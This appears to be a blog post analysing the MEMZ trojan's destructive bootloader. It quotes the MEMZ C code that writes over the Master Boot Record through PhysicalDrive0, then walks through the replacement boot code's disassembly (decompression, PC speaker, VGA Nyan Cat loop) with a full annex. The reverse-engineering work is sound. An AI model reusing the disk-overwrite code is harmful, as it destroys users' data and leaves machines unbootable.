Description

This post is more about the understanding what is going on with MEMZ bootloader replacement and how it works. The source code for MEMZ virus is also available here and the compiled executable from here. I have heard of this malware for some time but I did not find the time to really look into what MEMZ does.

The main goal of the post is to cover mainly on the destructive version of MEMZ. There are two types. Destructive (MBR overwrite) and Non-Destructive which allows user to recover from the infection.

The full disassembly can be found in the Annex.

Detonation :/

A quick detonation with Administrator Rights. It seems promising but after click on all the Yes’es, I was faced with BSOD. After resetting the VM, it is unsure of how to boot.

While the Master Boot Record has been overwritten, it is unable to start which I am not too sure why.

Since I do not want to find an older version of Windows just to video this, we can see the effect from the following YouTube Video by Siam Alam.

How was the Master Boot Record Altered

PhysicalDrive0 was the file path that was used to overwrite. The kernel code1 is appended with the compressed data code2 which contains all information of the Nyan Cat using a simple compression algorithm.

    HANDLE drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
  
    if (drive == INVALID_HANDLE_VALUE)
        ExitProcess(2);
  
    unsigned char *bootcode = (unsigned char *)LocalAlloc(LMEM_ZEROINIT, 65536);
  
    // Join the two code parts together
    int i = 0;
    for (; i < code1_len; i++)
        *(bootcode + i) = *(code1 + i);
    for (i = 0; i < code2_len; i++)
        *(bootcode + i + 0x1fe) = *(code2 + i);
  
    DWORD wb;
    if (!WriteFile(drive, bootcode, 65536, &wb, NULL))
        ExitProcess(3);

Master Boot Record (MBR)

Overview being that everything would work in real mode (16 bits) without entering to protected mode or IA-32e mode with the use of numerous Basic Input Output System (BIOS). Many of which can be referenced from https://en.wikipedia.org/wiki/BIOS_interrupt_call and https://wiki.osdev.org/BIOS.

Before starting, we should familiarize ourselves with the MBR format. MBR is booted to address 0x7c00 in memory containing the following format:

MBR Format

We can learn more about MBR from https://wiki.osdev.org/MBR_(x86).

OffsetSize (bytes)Description
0x0004401MBR Bootstrap (flat binary executable code)
0x1B84Optional “Unique Disk ID / Signature”2
0x1BC2Optional, reserved 0x00003
0x1BE16First partition table entry
0x1CE16Second partition table entry
0x1DE16Third partition table entry
0x1EE16Fourth partition table entry
0x1FE2(0x55, 0xAA) “Valid bootsector” signature bytes

In MEMZ, the boot code is of size 0x10000 or 65536 bytes. According to the source code, there are two parts of code (code1 and code2).

I have extracted the bootloader code in the Annex.

This is the first code that is being run upon startup once the MBR is being overwritten.

Debugging

I have extracted the bootloader portion of the malware and would want to debug the initial bootloader.

Furthermore, https://astralvx.com/debugging-16-bit-in-qemu-with-gdb-on-windows/ contains really helpful three helper scripts to let us debug the MBR!

gdb -ix "gdb_init_real_mode.txt" -ex "set tdesc filename target.xml" -ex "target remote localhost:1234" -ex "br *0x7c00" -ex "c"

Bootloader / MBR

In GDB, we should see the breakpoint at 0x7c00. This is also very useful since it shows us the data from different segments as well. Also, the ES:DI is also setup as a buffer for disk read later which we will see in the next section. For now, the segment register contains 0x7e0 in both the es and ds.

seg000:7C00
seg000:7C00 sub_7C00        proc near
seg000:7C00                 mov     bx, 7E0h
seg000:7C03                 mov     es, bx
seg000:7C05                 assume es:nothing
seg000:7C05                 mov     ds, bx

We can see the ES and DS value being changed to 0x7E0 as well. Note that we will see ES:DI being used as location to store data read from disk which should contain the compressed.bin.

Disk Reading and Storing to Free memory Outside MBR

With the BIOS Interrupt (0x13), it takes in the sector number, track and head value. The location makes use of CHS (Cylinder, Head, Sector) addressing scheme to read from in the disk. We can find out more from here

From the following lines, it states that there are:

  • Four sector counts from al register
  • Read from
    • Cylinder #0
    • Head #0
    • Sector #2
  • Data would be stored and read to ES:BX
    • To interpret this, we can calculate the address as (es<<16)+bx which means that data would be stored to address 0x7e00. This is where the loader is being stored typically.
  • Interrupt 0x13 would then trigger the Disk Read from location and storing into 0x7e00.
seg000:7C00 sub_7C00        proc near
seg000:7C00                 mov     bx, 7E0h
seg000:7C03                 mov     es, bx
seg000:7C05                 assume es:nothing
seg000:7C05                 mov     ds, bx
seg000:7C07                 assume ds:nothing
seg000:7C07                 mov     ax, 204h ; ah = 2, al =  sect count
seg000:7C0A                 mov     cx, 2  ; cl = sector, ch = 0
seg000:7C0D                 mov     dh, 0  ; dh = 0
seg000:7C0F                 mov     bx, 0
seg000:7C12                 int     13h    

We can see in GDB that the compressed data (highlighted in IDA) is stored in ES:BX. To calculate the linear address, we have to multiple ES by 16 and add the offset. In GDB, the bx and di register value contains offset 0 and therefore, we can see the same compressed data in the following screenshot.

We can confirm that the data are stored in 0x7e00!

(remote) gef➤  x/25bx 0x7e00
0x7e00: 0x83    0x11    0x11    0x11    0x11    0x00    0x00    0x04
0x7e08: 0x00    0x00    0x08    0x00    0x00    0x10    0x00    0x00
0x7e10: 0x20    0x00    0x35    0x0b    0x83    0xf1    0xf1    0x11
0x7e18: 0xf1

It is also consistent with the free space within the typical 8086 memory map. This free space at address 0x7e00 has a lot more than 512 bytes (boot sector). The following image was taken from here.

Next, decompression routine occurs. It has both lodsb and stosb instructions.

LODSB (Load String)

For legacy mode, Load byte at address DS:(E)SI into AL. Note that the SI register value would be incremented automatically.

In the following snippet, we have various registers being cleared to zero except for the di register. For the lodsb instruction, it would attempt to load the byte from 0x7e00

At [1], we are comparing to check if we have hit the 0x79E th bytes.

seg000:7C14                 xor     ax, ax
seg000:7C16                 mov     bx, ax
seg000:7C18                 mov     cx, ax
seg000:7C1A                 mov     dx, ax
seg000:7C1C                 mov     si, 0
seg000:7C1F                 mov     di, 4000h
seg000:7C22
seg000:7C22 loc_7C22:                               ; CODE XREF: sub_7C00+3D↓j
seg000:7C22                                         ; sub_7C00+5B↓j
seg000:7C22                 lodsb               ; ds is 0x7e0.
seg000:7C23                 cmp     si, 79Eh         ; [1]
seg000:7C27                 jnb     short loc_7C5E
seg000:7C29                 cmp     al, 80h
seg000:7C2B                 jnb     short loc_7C30
seg000:7C2D                 jmp     loc_7C40

STOSB (Store String)

STOS/STOSB/STOSW/STOSD/STOSQ — Store String For legacy mode, store AL at address ES:(E)DI; Note that the SI register value would be incremented automatically.

Decompression Algorithm

Starting from DI = 0x4000, ES = 0x7e0 giving linear address of (0x7e0 << 16) + 0x4000 = 0xbe00.

If 0x79e bytes have been covered, exit out of this loop. Else:

  1. Look at the byte of the data and check via lodsb
  2. Compare if value is less than 0x80
    1. If more (Direct Copy N number of times)
      1. bitwise (&) 0x7f to get the Most Significant Bit to get the counter value
        1. counter value is the result + 1 since the while loop check if it is -1 instead of 0.
        2. So if 0x83 & 0x7f = 3, then it will copy the next (3+1) bytes into the destination buffer
      2. It will then load a byte from the next compressed location into AL
      3. It will store that byte into ES:DI address from AL
    2. If less (Copy N bytes from offset of decompressed buffer)
      1. look at the next byte which gets the offset for DS*16+offset+0x4000 which is the destination of the decompressed buffer.

Copy (>0x80)

For example: The first byte is 0x83 (>0x80), we get 0x83 & 0x7f = 3. This means that we will copy the next 4 bytes from source which are the first 4 (0x11s).

(remote) gef➤  x/25bx 0x7e00
0x7e00: 0x83  [ 0x11    0x11    0x11    0x11 ]   0x00    0x00    0x04
0x7e08: 0x00    0x00    0x08    0x00    0x00    0x10    0x00    0x00
0x7e10: 0x20    0x00    0x35    0x0b    0x83    0xf1    0xf1    0x11
0x7e18: 0xf1

Back Reference (<0x80)

After the previous example: the next byte is 0x00 which is less than 0x80. The next byte which is the offset from the destination buffer which is 0x00. The next byte after this is the number of bytes from that offset of destination buffer to copy which is 0x04 bytes to copy. These 4 bytes are the 4 (0x11s) that was copied in the previous Copy (>0x80) example.

As we continue, we can find the decompressed data starting 0xbe00 after breaking at 0x7c5b.

Programmable Interrupt Timer (PIT)

In the next two lines after the decompression of data, we see that the Mode/Command Register of the PIT is being setup.

seg000:7C5E loc_7C5E:                               ; CODE XREF: sub_7C00+27↑j
seg000:7C5E                 mov     al, 0B6h
seg000:7C60                 out     43h, al         ; Timer 8253-5 (AT: 8254.2).

There are four I/O ports for PIT

I/O port     Usage
0x40         Channel 0 data port (read/write)
0x41         Channel 1 data port (read/write)
0x42         Channel 2 data port (read/write)
0x43         Mode/Command register (write only, a read is ignored)

According to http://www.osdever.net/bkerndev/Docs/pit.htm:

The Mode/Command register at I/O address 0x43 contains the following:

Bits         Usage
6 and 7      Select channel :
                0 0 = Channel 0
                0 1 = Channel 1
                1 0 = Channel 2
                1 1 = Read-back command (8254 only)
4 and 5      Access mode :
                0 0 = Latch count value command
                0 1 = Access mode: lobyte only
                1 0 = Access mode: hibyte only
                1 1 = Access mode: lobyte/hibyte
1 to 3       Operating mode :
                0 0 0 = Mode 0 (interrupt on terminal count)
                0 0 1 = Mode 1 (hardware re-triggerable one-shot)
                0 1 0 = Mode 2 (rate generator)
                0 1 1 = Mode 3 (square wave generator)
                1 0 0 = Mode 4 (software triggered strobe)
                1 0 1 = Mode 5 (hardware triggered strobe)
                1 1 0 = Mode 2 (rate generator, same as 010b)
                1 1 1 = Mode 3 (square wave generator, same as 011b)
0            BCD/Binary mode: 0 = 16-bit binary, 1 = four-digit BCD

Since the value set is 0xB6, which is 10 11 011 0 in binary, it tells the PIT chip that:

  1. Channel 2 of the PIT is setup
  2. Access mode is lobyte/hibyte
  3. Square Wave Generator
  4. 16 bit binary

PIT is important since it controls the clock for example for interrupts since the Programmable Interrupt Controller is connected to it as well.

Video Mode - No Blinking

IDA was nice enough to give comments on what this line is doing. int 0x10 deals with video. Many settings can be modified here potentially to choose things like video modes, VGA and more. In this line, it disables blinking of the text mode cursor.

seg000:7C65                 mov     bl, 0
seg000:7C67                 int     10h             ; - VIDEO - TOGGLE INTENSITY/BLINKING BIT (Jr, PS, TANDY 1000, EGA, VGA)
seg000:7C67                                         ; BL = 00h enable background intensity
seg000:7C67                                         ; = 01h enable blink

Dealing with Speaker for Sound

In the next portion, there are reference to I/O Port 0x61 which deals with the the “8042” PS/2 Controller or its predecessors, dealing with keyboards and mice. In our case, since di is 0, we are dealing with speaker. Reference How to make them computer beep? - OSDev.org

seg000:7C69                 mov     di, 0
seg000:7C6C                 mov     dx, 9DC0h
seg000:7C6F                 mov     cx, 0B800h
seg000:7C72                 mov     es, cx
seg000:7C74                 assume es:nothing
seg000:7C74                 mov     ax, 0
seg000:7C77                 mov     cx, 7D0h
seg000:7C7A                 rep stosw
seg000:7C7C                 mov     si, 9F9Ch
seg000:7C7F                 mov     di, 0
seg000:7C82                 in      al, 61h  ; turn the speaker on.
seg000:7C84                 or      al, 3  ; Tmr 2 gate ═╦═► OR 03H=spkr ON
seg000:7C86                 out     61h, al 

In this portion, the es register is being altered to 0xb800. This means that whatever gets stored, gets stored in 0xb8000. This address is the address of the VGA Frame buffer. We can store two bytes by two bytes (first byte refers to ASCII character, second byte refers to the color).

The instruction rep stosw means that it would be stored for cx repetitions, storing contents of ax into where es:di is pointing. Since ax is zero, it clears the screen.

Delay

From 221-int_15h_86h__wait - Tech Help!, we can tell that this is a WAIT for n microseconds and in this case, 0x6000 microseconds.

seg000:7C8A                 push    dx
seg000:7C8B                 mov     ah, 86h
seg000:7C8D                 mov     cx, 0
seg000:7C90                 mov     dx, 6000h
seg000:7C93                 int     15h             ; SYSTEM - WAIT (AT,XT2,XT286,CONV,PS)
seg000:7C93                                         ; CX,DX = number of microseconds to wait
seg000:7C93                                         ; Return: CF clear: after wait elapses, CF set: immediately due to error
 Returns: AH    86H
          AL    mask written to interrupt ctrlr 2 (if successful)
                unmodified (if fn is busy)
          CF    NC (0) no error
                CY (1) error; fn is busy

Loading the Trolling String

seg000:7C95                 pop     dx
seg000:7C96                 cmp     si, 9FE8h
seg000:7C9A                 jge     short loc_7CA0
seg000:7C9C                 lodsb
seg000:7C9D                 mov     ah, 0F0h
seg000:7C9F                 stosw

This would load the “Your computer has been trashed by the MEMZ trojan. Now enjoy the Nyan Cat … ” string and write it into the VGA Framebuffer to print onto the screen.

For each of the character, it would play the sound from the speaker via signalling to the timer at channel 2 (0x42 of I/O port).

seg000:7CAB                 mov     cx, ax
seg000:7CAD                 and     ah, 1Fh
seg000:7CB0                 out     42h, al         ; Timer 8253-5 (AT: 8254.2).
seg000:7CB2                 mov     al, ah
seg000:7CB4                 out     42h, al         ; Timer 8253-5 (AT: 8254.2).
seg000:7CB6                 shr     ch, 5
seg000:7CB9                 shl     ch, 2
seg000:7CBC                 mov     bl, ch
seg000:7CBE                 mov     dx, si
seg000:7CC0                 pop     si
seg000:7CC1                 cmp     dx, 9DF4h
seg000:7CC5                 jnz     short loc_7C8A

After the printing of the trolling line

Printing Nyan :3

The Data Segment is readjusted to 0x7e0 which at offset 0 points to the compressed data. The Extra Segment is adjusted to 0xb800 which at offset 0 points to the start of the VGA FrameBuffer.

Next Store the 0xdc value into VGA Buffer to print nothing and then setting color to value 0x11 for example found in the compressed data.

In standard VGA text mode each cell is defined by two bytes: one for the character (here, 0xdc) and one for the attribute (here, 0x11). When blinking is disabled via the INT 10h call (with AX=1003h and BL=0), the attribute byte’s upper 4 bits specify the background color and the lower 4 bits specify the foreground color.

For attribute 0x11, when expressed in hexadecimal that’s:

  • Foreground (lower nibble): 0x1
  • Background (upper nibble): 0x1
seg000:7CC7                 mov     si, 4000h
seg000:7CCA                 mov     di, 0
seg000:7CCD                 mov     ax, 7E0h
seg000:7CD0                 mov     ds, ax
seg000:7CD2                 mov     ax, 0B800h
seg000:7CD5                 mov     es, ax
seg000:7CD7                 dec     bl
seg000:7CD9                 jmp     loc_7CFC
seg000:7CDC ; ---------------------------------------------------------------------------
seg000:7CDC
seg000:7CDC loc_7CDC:                               ; CODE XREF: sub_7C00+ED↓j
seg000:7CDC                                         ; sub_7C00+10D↓j ...
seg000:7CDC                 mov     al, 0DCh
seg000:7CDE                 stosb
seg000:7CDF                 lodsb
seg000:7CE0                 stosb
seg000:7CE1                 cmp     si, 9DC0h
seg000:7CE5                 jz      short loc_7D29
seg000:7CE7                 cmp     di, 0FA0h
seg000:7CEB                 jz      short loc_7CF0
seg000:7CED                 jmp     loc_7CDC

Completion of drawing of one Nyan Picture as shown in the following figure after hitting a breakpoint. Realise that there will be another 6000 microseconds Delay

This would continue and loop through the decompressed data and just keeps going on forever.

Video (Not mine)

There are many videos in Youtube that shows the aftermath after the MBR has been overwritten. Here is one of those out there:

Conclusion

I had fun understanding what happens under the hood including:

  1. Printing on the screen via VGA Framebuffer
  2. Programmable Interrupt Timer which makes use of channel 2 for the speaker
  3. Decompression implemented on the second part
  4. The separation of memory to achieve things
  5. Better understanding of lobsb and stosb related instructions
  6. How to make a beep
  7. Better appreciation of how the BIOS interrupts work

Annex

Bootloader From IDA

I have rebased the segment to 0x7c00 as that is the location where the computer will look for the bootloader.

seg000:7C00 sub_7C00        proc near
seg000:7C00                 mov     bx, 7E0h
seg000:7C03                 mov     es, bx
seg000:7C05                 assume es:nothing
seg000:7C05                 mov     ds, bx
seg000:7C07                 assume ds:nothing
seg000:7C07                 mov     ax, 204h
seg000:7C0A                 mov     cx, 2
seg000:7C0D                 mov     dh, 0
seg000:7C0F                 mov     bx, 0
seg000:7C12                 int     13h             ; DISK - READ SECTORS INTO MEMORY
seg000:7C12                                         ; AL = number of sectors to read, CH = track, CL = sector
seg000:7C12                                         ; DH = head, DL = drive, ES:BX -> buffer to fill
seg000:7C12                                         ; Return: CF set on error, AH = status, AL = number of sectors read
seg000:7C14                 xor     ax, ax
seg000:7C16                 mov     bx, ax
seg000:7C18                 mov     cx, ax
seg000:7C1A                 mov     dx, ax
seg000:7C1C                 mov     si, 0
seg000:7C1F                 mov     di, 4000h
seg000:7C22
seg000:7C22 loc_7C22:                               ; CODE XREF: sub_7C00+3D↓j
seg000:7C22                                         ; sub_7C00+5B↓j
seg000:7C22                 lodsb
seg000:7C23                 cmp     si, 79Eh
seg000:7C27                 jnb     short loc_7C5E
seg000:7C29                 cmp     al, 80h
seg000:7C2B                 jnb     short loc_7C30
seg000:7C2D                 jmp     loc_7C40
seg000:7C30 ; ---------------------------------------------------------------------------
seg000:7C30
seg000:7C30 loc_7C30:                               ; CODE XREF: sub_7C00+2B↑j
seg000:7C30                 and     al, 7Fh
seg000:7C32                 mov     cl, al
seg000:7C34
seg000:7C34 loc_7C34:                               ; CODE XREF: sub_7C00+3B↓j
seg000:7C34                 lodsb
seg000:7C35                 stosb
seg000:7C36                 dec     cl
seg000:7C38                 cmp     cl, 0FFh
seg000:7C3B                 jnz     short loc_7C34
seg000:7C3D                 jmp     loc_7C22
seg000:7C40 ; ---------------------------------------------------------------------------
seg000:7C40
seg000:7C40 loc_7C40:                               ; CODE XREF: sub_7C00+2D↑j
seg000:7C40                 mov     ah, al
seg000:7C42                 lodsb
seg000:7C43                 mov     bx, ax
seg000:7C45                 lodsb
seg000:7C46                 mov     dx, si
seg000:7C48                 mov     si, bx
seg000:7C4A                 add     si, 4000h
seg000:7C4E                 mov     cl, al
seg000:7C50
seg000:7C50 loc_7C50:                               ; CODE XREF: sub_7C00+57↓j
seg000:7C50                 lodsb
seg000:7C51                 stosb
seg000:7C52                 dec     cl
seg000:7C54                 cmp     cl, 0
seg000:7C57                 jnz     short loc_7C50
seg000:7C59                 mov     si, dx
seg000:7C5B                 jmp     loc_7C22
seg000:7C5E ; ---------------------------------------------------------------------------
seg000:7C5E
seg000:7C5E loc_7C5E:                               ; CODE XREF: sub_7C00+27↑j
seg000:7C5E                 mov     al, 0B6h
seg000:7C60                 out     43h, al         ; Timer 8253-5 (AT: 8254.2).
seg000:7C62                 mov     ax, 1003h
seg000:7C65                 mov     bl, 0
seg000:7C67                 int     10h             ; - VIDEO - TOGGLE INTENSITY/BLINKING BIT (Jr, PS, TANDY 1000, EGA, VGA)
seg000:7C67                                         ; BL = 00h enable background intensity
seg000:7C67                                         ; = 01h enable blink
seg000:7C69                 mov     di, 0
seg000:7C6C                 mov     dx, 9DC0h
seg000:7C6F                 mov     cx, 0B800h
seg000:7C72                 mov     es, cx
seg000:7C74                 assume es:nothing
seg000:7C74                 mov     ax, 0
seg000:7C77                 mov     cx, 7D0h
seg000:7C7A                 rep stosw
seg000:7C7C                 mov     si, 9F9Ch
seg000:7C7F                 mov     di, 0
seg000:7C82                 in      al, 61h         ; PC/XT PPI port B bits:
seg000:7C82                                         ; 0: Tmr 2 gate ═╦═► OR 03H=spkr ON
seg000:7C82                                         ; 1: Tmr 2 data ═╝  AND 0fcH=spkr OFF
seg000:7C82                                         ; 3: 1=read high switches
seg000:7C82                                         ; 4: 0=enable RAM parity checking
seg000:7C82                                         ; 5: 0=enable I/O channel check
seg000:7C82                                         ; 6: 0=hold keyboard clock low
seg000:7C82                                         ; 7: 0=enable kbrd
seg000:7C84                 or      al, 3
seg000:7C86                 out     61h, al         ; PC/XT PPI port B bits:
seg000:7C86                                         ; 0: Tmr 2 gate ═╦═► OR 03H=spkr ON
seg000:7C86                                         ; 1: Tmr 2 data ═╝  AND 0fcH=spkr OFF
seg000:7C86                                         ; 3: 1=read high switches
seg000:7C86                                         ; 4: 0=enable RAM parity checking
seg000:7C86                                         ; 5: 0=enable I/O channel check
seg000:7C86                                         ; 6: 0=hold keyboard clock low
seg000:7C86                                         ; 7: 0=enable kbrd
seg000:7C88                 mov     bl, 1
seg000:7C8A
seg000:7C8A loc_7C8A:                               ; CODE XREF: sub_7C00+A5↓j
seg000:7C8A                                         ; sub_7C00+C5↓j
seg000:7C8A                 push    dx
seg000:7C8B                 mov     ah, 86h
seg000:7C8D                 mov     cx, 0
seg000:7C90                 mov     dx, 6000h
seg000:7C93                 int     15h             ; SYSTEM - WAIT (AT,XT2,XT286,CONV,PS)
seg000:7C93                                         ; CX,DX = number of microseconds to wait
seg000:7C93                                         ; Return: CF clear: after wait elapses, CF set: immediately due to error
seg000:7C95                 pop     dx
seg000:7C96                 cmp     si, 9FE8h
seg000:7C9A                 jge     short loc_7CA0
seg000:7C9C                 lodsb
seg000:7C9D                 mov     ah, 0F0h
seg000:7C9F                 stosw
seg000:7CA0
seg000:7CA0 loc_7CA0:                               ; CODE XREF: sub_7C00+9A↑j
seg000:7CA0                 dec     bl
seg000:7CA2                 cmp     bl, 0
seg000:7CA5                 jnz     short loc_7C8A
seg000:7CA7                 push    si
seg000:7CA8                 mov     si, dx
seg000:7CAA                 lodsw
seg000:7CAB                 mov     cx, ax
seg000:7CAD                 and     ah, 1Fh
seg000:7CB0                 out     42h, al         ; Timer 8253-5 (AT: 8254.2).
seg000:7CB2                 mov     al, ah
seg000:7CB4                 out     42h, al         ; Timer 8253-5 (AT: 8254.2).
seg000:7CB6                 shr     ch, 5
seg000:7CB9                 shl     ch, 2
seg000:7CBC                 mov     bl, ch
seg000:7CBE                 mov     dx, si
seg000:7CC0                 pop     si
seg000:7CC1                 cmp     dx, 9DF4h
seg000:7CC5                 jnz     short loc_7C8A
seg000:7CC7                 mov     si, 4000h
seg000:7CCA                 mov     di, 0
seg000:7CCD                 mov     ax, 7E0h
seg000:7CD0                 mov     ds, ax
seg000:7CD2                 mov     ax, 0B800h
seg000:7CD5                 mov     es, ax
seg000:7CD7                 dec     bl
seg000:7CD9                 jmp     loc_7CFC
seg000:7CDC ; ---------------------------------------------------------------------------
seg000:7CDC
seg000:7CDC loc_7CDC:                               ; CODE XREF: sub_7C00+ED↓j
seg000:7CDC                                         ; sub_7C00+10D↓j ...
seg000:7CDC                 mov     al, 0DCh
seg000:7CDE                 stosb
seg000:7CDF                 lodsb
seg000:7CE0                 stosb
seg000:7CE1                 cmp     si, 9DC0h
seg000:7CE5                 jz      short loc_7D29
seg000:7CE7                 cmp     di, 0FA0h
seg000:7CEB                 jz      short loc_7CF0
seg000:7CED                 jmp     loc_7CDC
seg000:7CF0 ; ---------------------------------------------------------------------------
seg000:7CF0
seg000:7CF0 loc_7CF0:                               ; CODE XREF: sub_7C00+EB↑j
seg000:7CF0                                         ; sub_7C00+12C↓j
seg000:7CF0                 push    dx
seg000:7CF1                 mov     ah, 86h
seg000:7CF3                 mov     cx, 1
seg000:7CF6                 mov     dx, 6000h
seg000:7CF9                 int     15h             ; SYSTEM - WAIT (AT,XT2,XT286,CONV,PS)
seg000:7CF9                                         ; CX,DX = number of microseconds to wait
seg000:7CF9                                         ; Return: CF clear: after wait elapses, CF set: immediately due to error
seg000:7CFB                 pop     dx
seg000:7CFC
seg000:7CFC loc_7CFC:                               ; CODE XREF: sub_7C00+D9↑j
seg000:7CFC                 mov     di, 0
seg000:7CFF                 cmp     dx, 9F9Ch
seg000:7D03                 jnz     short loc_7D08
seg000:7D05                 mov     dx, 9DF4h
seg000:7D08
seg000:7D08 loc_7D08:                               ; CODE XREF: sub_7C00+103↑j
seg000:7D08                 dec     bl
seg000:7D0A                 cmp     bl, 0
seg000:7D0D                 jnz     short loc_7CDC
seg000:7D0F                 push    si
seg000:7D10                 mov     si, dx
seg000:7D12                 lodsw
seg000:7D13                 mov     cx, ax
seg000:7D15                 and     ah, 1Fh
seg000:7D18                 out     42h, al         ; Timer 8253-5 (AT: 8254.2).
seg000:7D1A                 mov     al, ah
seg000:7D1C                 out     42h, al         ; Timer 8253-5 (AT: 8254.2).
seg000:7D1E                 shr     ch, 5
seg000:7D21                 mov     bl, ch
seg000:7D23                 mov     dx, si
seg000:7D25                 pop     si
seg000:7D26                 jmp     loc_7CDC
seg000:7D29 ; ---------------------------------------------------------------------------
seg000:7D29
seg000:7D29 loc_7D29:                               ; CODE XREF: sub_7C00+E5↑j
seg000:7D29                 mov     si, 4000h
seg000:7D2C                 jmp     loc_7CF0
seg000:7D2C sub_7C00        endp